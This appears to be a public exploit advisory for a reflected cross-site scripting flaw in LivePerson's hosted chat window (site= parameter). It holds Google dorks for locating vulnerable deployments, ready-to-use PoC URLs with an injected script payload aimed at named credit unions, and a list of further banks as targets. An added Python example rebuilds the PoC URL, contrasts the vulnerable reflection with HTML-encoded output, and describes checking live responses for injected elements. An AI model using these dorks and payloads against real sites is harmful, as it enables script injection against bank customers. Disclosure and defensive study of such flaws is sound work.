# Exploit Title: LivePerson Cross Site Scripting
# Date: 15.03.2012
# Author: Sony
# Software Link: http://liveperson.com/
# Google Dorks: inurl:/window/top.asp?site= or inurl:/window/main.asp?site=
# Web Browser : Mozilla Firefox
# Site : http://insecurity.ro
# PoC: http://st2tea.blogspot.com/2012/03/liveperson-cross-site-scripting.html

..................................................................

When you use the Google dorks, click on "If you like, you can repeat the search with the omitted results included."

Well, yeah, we can see Cross Site Scripting in LivePerson. The site= parameter of the hosted chat window (window_main.asp / main.asp on server.iad.liveperson.net) is reflected into the page without HTML encoding. The PoC payload appended to the site ID, ""><script>alert("1")</script>, is built to close a quoted attribute value and its tag and then inject a script element. This is a reflected XSS: the victim has to open the crafted link, and the script then runs in the server.iad.liveperson.net origin, i.e. inside the LivePerson chat window, not on the bank's own domain.

What is LivePerson? http://en.wikipedia.org/wiki/LivePerson

Today I spoke with tech support and asked who uses LivePerson:

The fact that we currently have over 8,500 clients, including many Fortune 500 companies such as Verizon, Adobe, Cisco, Estee Lauder, Home Depot, Neiman Marcus, Panasonic, Bank of America, Chase, HSBC, Microsoft, HP, IBM, Hoovers and Citibank, is testimony to the quality of service, security and support we provide our customers. (c) Support

But well, now the demo:

Safe Credit Union
https://www.safecu.org/
http://server.iad.liveperson.net/visitor/68511475/window/window_main.asp?site=68511475[our xss is here]&page=&loginsso=

What is 68511475? The site ID.

http://3.bp.blogspot.com/-MNXjJ2QHHnI/T2GndWf-H7I/AAAAAAAAAvY/KTKGP1h16ww/s1600/safecredit.JPG

http://server.iad.liveperson.net/visitor/68511475/window/window_main.asp?site=68511475%22%22%3E%3Cscript%3Ealert%28%221%22%29%3C/script%3E&page=&loginsso=

American Airlines Federal Credit Union
https://www.aacreditunion.org/home.aspx
https://server.iad.liveperson.net/visitor/LPaaefcu_mbrsrvs/window/main.asp?site=LPaaefcu_mbrsrvs%22%22%3E%3Cscript%3Ealert%28%221%22%29%3C/script%3E&page=&loginsso=

http://2.bp.blogspot.com/-kvOY3siw2Ek/T2Gn5BoaFqI/AAAAAAAAAvk/kMJzP7sm8Eg/s1600/liveperson.JPG

More? Use the Google dorks.
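To make the mechanics concrete, here is an added Python example (written for this page, not LivePerson's code). It decodes the site= value out of the PoC URL above, rebuilds that URL from its parts with the same percent-encoding, and pushes the value through a hypothetical stand-in for window_main.asp / main.asp (the real ASP source is not available here) once unencoded and once with HTML attribute encoding. Both outputs are then run through a parser to show that only the unencoded reflection produces a new script element.

```python
"""Reflected XSS via the LivePerson site= parameter: decode, rebuild, reflect, check.

Added example for this advisory; not LivePerson code. render_vulnerable and
render_fixed are hypothetical stand-ins for the ASP chat-window page.
"""
from html import escape
from html.parser import HTMLParser
from urllib.parse import parse_qs, quote, urlencode, urlsplit

# PoC URL quoted in the advisory (American Airlines FCU instance).
POC_URL = (
    "https://server.iad.liveperson.net/visitor/LPaaefcu_mbrsrvs/window/main.asp"
    "?site=LPaaefcu_mbrsrvs%22%22%3E%3Cscript%3Ealert%28%221%22%29%3C/script%3E"
    "&page=&loginsso="
)
BASE_URL = "https://server.iad.liveperson.net/visitor/LPaaefcu_mbrsrvs/window/main.asp"
SITE_ID = "LPaaefcu_mbrsrvs"
XSS_PAYLOAD = '""><script>alert("1")</script>'  # what the PoC appends to the site ID


def site_param(url):
    """Decode the site= query parameter, i.e. the value the ASP page reflects."""
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return query["site"][0]


def build_poc(base_url, site_id, payload=XSS_PAYLOAD):
    """Rebuild the advisory's PoC URL from its parts (quote keeps '/' unencoded, like the page)."""
    params = {"site": site_id + payload, "page": "", "loginsso": ""}
    return base_url + "?" + urlencode(params, safe="/", quote_via=quote)


def render_vulnerable(site):
    """Hypothetical template: the site ID lands in an attribute value unencoded."""
    return f'<input type="hidden" name="site" value="{site}">'


def render_fixed(site):
    """Same template with attribute encoding; quote=True also encodes the double quote,
    so the payload can no longer close the attribute."""
    return f'<input type="hidden" name="site" value="{escape(site, quote=True)}">'


class _TagCollector(HTMLParser):
    """Records the start tags the parser sees, in document order."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)


def element_names(markup):
    """Element names a browser-like parser extracts from the response.
    A 'script' entry that the template never wrote means the injection worked."""
    parser = _TagCollector()
    parser.feed(markup)
    parser.close()
    return parser.tags


if __name__ == "__main__":
    site = site_param(POC_URL)
    print("decoded site= :", site)
    print("rebuilt URL ok:", build_poc(BASE_URL, SITE_ID) == POC_URL)
    print("vulnerable    :", element_names(render_vulnerable(site)))
    print("fixed         :", element_names(render_fixed(site)))
```

The same check works against a live response: fetch the crafted URL, feed the body to element_names, and look for an element the page itself would not emit. That is more reliable than grepping for the payload string, because a page that reflects the value inside a comment or a JavaScript string can contain the text without creating a new element, while one that reflects it inside an attribute, as here, does.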
We can see in the Google dorks:

Busey Bank
http://en.wikipedia.org/wiki/Busey_Bank (wow, 1868)
Del Norte Credit Union
https://www.dncu.org/
San Diego Metropolitan Credit Union
https://www.sdmcu.org/home/home
Bank Financial
https://www.bankfinancial.com/home/home
Baton Rouge Telco Federal Credit Union
http://www.brtelco.org/home/accounts
etc.

..................................................................

InSecurity.Ro
Because we care, we're security aware!